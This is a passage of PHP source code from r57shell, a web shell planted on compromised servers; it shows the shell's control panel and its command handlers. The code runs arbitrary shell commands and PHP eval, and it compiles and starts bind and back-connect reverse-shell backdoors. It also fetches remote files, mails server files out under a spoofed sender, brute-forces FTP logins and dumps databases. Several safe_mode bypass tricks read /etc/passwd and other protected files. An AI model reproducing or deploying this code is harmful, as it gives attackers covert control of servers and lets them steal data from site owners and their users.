1522 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1523 echo ws(2)."safe_mode: <b>";
1524 echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
1525 echo "</b>".ws(2);
1526 echo "PHP version: <b>".@phpversion()."</b>";
1527 $curl_on = @function_exists('curl_version');
1528 echo ws(2);
1529 echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
1530 echo "</b>".ws(2);
1531 echo "MySQL: <b>";
1532 $mysql_on = @function_exists('mysql_connect');
1533 if($mysql_on){
1534 echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
1535 echo "</b>".ws(2);
1536 echo "MSSQL: <b>";
1537 $mssql_on = @function_exists('mssql_connect');
1538 if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1539 echo "</b>".ws(2);
1540 echo "PostgreSQL: <b>";
1541 $pg_on = @function_exists('pg_connect');
1542 if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1543 echo "</b>".ws(2);
1544 echo "Oracle: <b>";
1545 $ora_on = @function_exists('ocilogon');
1546 if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
1547 echo "</b><br>".ws(2);
1548 echo "Disable functions : <b>";
1549 if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
1550 $free = @diskfreespace($dir);
1551 if (!$free) {$free = 0;}
1552 $all = @disk_total_space($dir);
1553 if (!$all) {$all = 0;}
1554 echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1555 echo '</font></td></tr><table>
1556 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1557 <tr><td align=right width=100>';
1558 echo $font;
1559 if($unix){
1560 echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1561 echo "</td><td>";
1562 echo "<font face=Verdana size=-2 color=red><b>";
1563 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1564 echo ws(3).$sysctl."<br>";
1565 echo ws(3).ex('echo $OSTYPE')."<br>";
1566 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1567 if(!empty($id)) { echo ws(3).$id."<br>"; }
1568 else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
1569 {
1570 $euserinfo = @posix_getpwuid(@posix_geteuid());
1571 $egroupinfo = @posix_getgrgid(@posix_getegid());
1572 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1573 }
1574 else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1575 echo ws(3).$dir;
1576 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1577 echo "</b></font>";
1578 }
1579 else
1580 {
1581 echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1582 echo "</td><td>";
1583 echo "<font face=Verdana size=-2 color=red><b>";
1584 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1585 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1586 echo ws(3).@getenv("USERNAME")."<br>";
1587 echo ws(3).$dir;
1588 echo "<br></font>";
1589 }
1590 echo "</font>";
1591 echo "</td></tr></table>";
1592 if(empty($c1)||empty($c2)) { die(); }
1593 $f = '<br>';
1594 $f .= base64_decode($c1);
1595 $f .= base64_decode($c2);
1596 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
1597 {
1598 $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
1599 err(6+$res);
1600 $_POST['cmd']="";
1601 }
1602 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1603 {
1604 if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
1605 else
1606 {
1607 $filename = @basename($_POST['loc_file']);
1608 $filedump = @fread($file,@filesize($_POST['loc_file']));
1609 fclose($file);
1610 $content_encoding=$mime_type='';
1611 compress($filename,$filedump,$_POST['compress']);
1612 $attach = array(
1613 "name"=>$filename,
1614 "type"=>$mime_type,
1615 "content"=>$filedump
1616 );
1617 if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1618 if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1619 $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1620 err(6+$res);
1621 $_POST['cmd']="";
1622 }
1623 }
1624 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1625 {
1626 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1627 }
1628 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1629 {
1630 switch($_POST['what'])
1631 {
1632 case 'own':
1633 @chown($_POST['param1'],$_POST['param2']);
1634 break;
1635 case 'grp':
1636 @chgrp($_POST['param1'],$_POST['param2']);
1637 break;
1638 case 'mod':
1639 @chmod($_POST['param1'],intval($_POST['param2'], 8));
1640 break;
1641 }
1642 $_POST['cmd']="";
1643 }
1644 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1645 {
1646 switch($_POST['what'])
1647 {
1648 case 'file':
1649 if($_POST['action'] == "create")
1650 {
1651 if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1652 else {
1653 fclose($file);
1654 $_POST['e_name'] = $_POST['mk_name'];
1655 $_POST['cmd']="edit_file";
1656 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1657 }
1658 }
1659 else if($_POST['action'] == "delete")
1660 {
1661 if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1662 $_POST['cmd']="";
1663 }
1664 break;
1665 case 'dir':
1666 if($_POST['action'] == "create"){
1667 if(mkdir($_POST['mk_name']))
1668 {
1669 $_POST['cmd']="";
1670 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1671 }
1672 else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1673 }
1674 else if($_POST['action'] == "delete"){
1675 if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1676 $_POST['cmd']="";
1677 }
1678 break;
1679 }
1680 }
1681 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1682 {
1683 if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1684 if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
1685 else {
1686 echo $table_up3;
1687 echo $font;
1688 echo "<form name=save_file method=post>";
1689 echo ws(3)."<b>".$_POST['e_name']."</b>";
1690 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1691 echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1692 fclose($file);
1693 echo "</textarea>";
1694 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1695 echo "<input type=hidden name=dir value=".$dir.">";
1696 echo "<input type=hidden name=cmd value=save_file>";
1697 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1698 echo "</div>";
1699 echo "</font>";
1700 echo "</form>";
1701 echo "</td></tr></table>";
1702 exit();
1703 }
1704 }
1705 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1706 {
1707 $mtime = @filemtime($_POST['e_name']);
1708 if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
1709 else {
1710 if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1711 @fwrite($file,$_POST['e_text']);
1712 @touch($_POST['e_name'],$mtime,$mtime);
1713 $_POST['cmd']="";
1714 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1715 }
1716 }
1717 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1718 {
1719 cf("/tmp/bd.c",$port_bind_bd_c);
1720 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1721 @unlink("/tmp/bd.c");
1722 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1723 $_POST['cmd']="ps -aux | grep bd";
1724 }
1725 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1726 {
1727 cf("/tmp/bdpl",$port_bind_bd_pl);
1728 $p2=which("perl");
1729 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1730 $_POST['cmd']="ps -aux | grep bdpl";
1731 }
1732 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1733 {
1734 cf("/tmp/back",$back_connect);
1735 $p2=which("perl");
1736 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1737 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1738 }
1739 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1740 {
1741 cf("/tmp/back.c",$back_connect_c);
1742 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1743 @unlink("/tmp/back.c");
1744 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1745 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1746 }
1747 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1748 {
1749 cf("/tmp/dp",$datapipe_pl);
1750 $p2=which("perl");
1751 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1752 $_POST['cmd']="ps -aux | grep dp";
1753 }
1754 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1755 {
1756 cf("/tmp/dpc.c",$datapipe_c);
1757 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1758 @unlink("/tmp/dpc.c");
1759 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1760 $_POST['cmd']="ps -aux | grep dpc";
1761 }
1762 if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
1763 if (!empty($HTTP_POST_FILES['userfile']['name']))
1764 {
1765 if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1766 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1767 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
1768 $_POST['dir']."/".$nfn)
1769 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1770 }
1771 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1772 {
1773 switch($_POST['with'])
1774 {
1775 case wget:
1776 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1777 break;
1778 case fetch:
1779 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1780 break;
1781 case lynx:
1782 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1783 break;
1784 case links:
1785 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1786 break;
1787 case GET:
1788 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1789 break;
1790 case curl:
1791 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1792 break;
1793 }
1794 }
1795 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1796 {
1797 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1798 if(empty($ftp_port)) { $ftp_port = 21; }
1799 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1800 if(!$connection) { err(3); }
1801 else
1802 {
1803 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
1804 else
1805 {
1806 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
1807 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
1808 }
1809 }
1810 @ftp_close($connection);
1811 $_POST['cmd'] = "";
1812 }
1813 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
1814 {
1815 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1816 if(empty($ftp_port)) { $ftp_port = 21; }
1817 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1818 if(!$connection) { err(3); $_POST['cmd'] = ""; }
1819 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
1820 @ftp_close($connection);
1821 }
1822 echo $table_up3;
1823 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
1824 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
1825 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1826 if($safe_mode)
1827 {
1828 switch($_POST['cmd'])
1829 {
1830 case 'safe_dir':
1831 $d=@dir($dir);
1832 if ($d)
1833 {
1834 while (false!==($file=$d->read()))
1835 {
1836 if ($file=="." || $file=="..") continue;
1837 @clearstatcache();
1838 list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
1839 if(!$unix){
1840 echo date("d.m.Y H:i",$mtime);
1841 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
1842 }
1843 else{
1844 $owner = @posix_getpwuid($uid);
1845 $grgid = @posix_getgrgid($gid);
1846 echo $inode." ";
1847 echo perms(@fileperms($file));
1848 printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1849 echo date("d.m.Y H:i ",$mtime);
1850 }
1851 echo "$file\n";
1852 }
1853 $d->close();
1854 }
1855 else echo $lang[$language._text29];
1856 break;
1857 case 'test1':
1858 $ci = @curl_init("file://".$_POST['test1_file']."");
1859 $cf = @curl_exec($ci);
1860 echo $cf;
1861 break;
1862 case 'test2':
1863 @include($_POST['test2_file']);
1864 break;
1865 case 'test3':
1866 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
1867 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1868 if($db)
1869 {
1870 if(@mysql_select_db($_POST['test3_md'],$db))
1871 {
1872 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1873 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
1874 @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
1875 $r = @mysql_query("SELECT * FROM temp_r57_table");
1876 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1877 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1878 }
1879 else echo "[-] ERROR! Can't select database";
1880 @mysql_close($db);
1881 }
1882 else echo "[-] ERROR! Can't connect to mysql server";
1883 break;
1884 case 'test4':
1885 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
1886 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1887 if($db)
1888 {
1889 if(@mssql_select_db($_POST['test4_md'],$db))
1890 {
1891 @mssql_query("drop table r57_temp_table",$db);
1892 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1893 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1894 $res = mssql_query("select * from r57_temp_table",$db);
1895 while(($row=@mssql_fetch_row($res)))
1896 {
1897 echo $row[0]."\r\n";
1898 }
1899 @mssql_query("drop table r57_temp_table",$db);
1900 }
1901 else echo "[-] ERROR! Can't select database";
1902 @mssql_close($db);
1903 }
1904 else echo "[-] ERROR! Can't connect to MSSQL server";
1905 break;
1906 case 'test5':
1907 if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
1908 $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
1909 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
1910 $lines = file ('/tmp/mb_send_mail');
1911 foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
1912 break;
1913 case 'test6':
1914 $stream = @imap_open('/etc/passwd', "", "");
1915 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
1916 for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
1917 @imap_close($stream);
1918 break;
1919 case 'test7':
1920 $stream = @imap_open($_POST['test7_file'], "", "");
1921 $str = @imap_body($stream, 1);
1922 echo $str;
1923 @imap_close($stream);
1924 break;
1925 case 'test8':
1926 if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
1927 else echo $lang[$language.'_text119'];
1928 break;
1929 }
1930 }
1931 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
1932 $cmd_rep = ex($_POST['cmd']);
1933 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
1934 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
1935 if ($_POST['cmd']=="ftp_brute")
1936 {
1937 $suc = 0;
1938 foreach($users as $user)
1939 {
1940 $connection = @ftp_connect($ftp_server,$ftp_port,10);
1941 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
1942 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
1943 @ftp_close($connection);
1944 }
1945 echo "\r\n-------------------------------------\r\n";
1946 $count = count($users);
1947 if(isset($_POST['reverse'])) { $count *= 2; }
1948 echo $lang[$language.'_text97'].$count."\r\n";
1949 echo $lang[$language.'_text98'].$suc."\r\n";
1950 }
1951 if ($_POST['cmd']=="php_eval"){
1952 $eval = @str_replace("<?","",$_POST['php_eval']);
1953 $eval = @str_replace("?>","",$eval);
1954 @eval($eval);}
1955 if ($_POST['cmd']=="mysql_dump")
1956 {
1957 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
1958 $sql = new my_sql();
1959 $sql->db = $_POST['db'];
1960 $sql->host = $_POST['db_server'];
1961 $sql->port = $_POST['db_port'];
1962 $sql->user = $_POST['mysql_l'];
1963 $sql->pass = $_POST['mysql_p'];
1964 $sql->base = $_POST['mysql_db'];
1965 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
1966 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
1967 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
1968 else {
1969 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
1970 else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
1971 else { echo "[-] ERROR! Can't write in dump file"; }
1972 }
1973 }
1974 echo "</textarea></div>";
1975 echo "</b>";
1976 echo "</td></tr></table>";
1977 echo "<table width=100% cellpadding=0 cellspacing=0>";
1978 function div_title($title, $id)
1979 {
1980 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
1981 }
1982 function div($id)
1983 {
1984 if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
1985 return '<div id="'.$id.'">';
1986 }
1987 if(!$safe_mode){
1988 echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
1989 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
1990 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1991 echo $te.'</div>'.$table_end1.$fe;
1992 }
1993 else{
1994 echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
1995 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
1996 echo $te.'</div>'.$table_end1.$fe;
1997 }
1998 echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
1999 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2000 echo $te.'</div>'.$table_end1.$fe;
2001 if($safe_mode){
2002 echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
2003 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2004 echo $te.'</div>'.$table_end1.$fe;
2005 }
2006 if($safe_mode && $unix){
2007 echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
2008 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2009 echo $te.'</div>'.$table_end1.$fe;
2010 }
2011 if(!$safe_mode){
2012 $aliases2 = '';
2013 foreach ($aliases as $alias_name=>$alias_cmd)
2014 {
2015 $aliases2 .= "<option>$alias_name</option>";
2016 }
2017 echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
2018 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2019 echo $te.'</div>'.$table_end1.$fe;
2020 }
2021 echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
2022 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2023 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2024 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2025 echo $te.'</div>'.$table_end1.$fe;
2026 if(!$safe_mode && $unix){
2027 echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
2028 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2029 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2030 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2031 echo $te.'</div>'.$table_end1.$fe;
2032 }
2033 echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
2034 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2035 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
2036 echo "</textarea>";
2037 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2038 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2039 echo "</div></div></font>";
2040 echo $table_end1.$fe;
2041 if($safe_mode&&$curl_on)
2042 {
2043 echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
2044 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2045 echo $te.'</div>'.$table_end1.$fe;
2046 }
2047 if($safe_mode)
2048 {
2049 echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2050 echo "<table class=table1 width=100% align=center>";
2051 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2052 echo $te.'</div>'.$table_end1.$fe;
2053 }
2054 if($safe_mode&&$mysql_on)
2055 {
2056 echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
2057 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2058 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2059 echo $te.'</div>'.$table_end1.$fe;
2060 }
2061 if($safe_mode&&$mssql_on)
2062 {
2063 echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
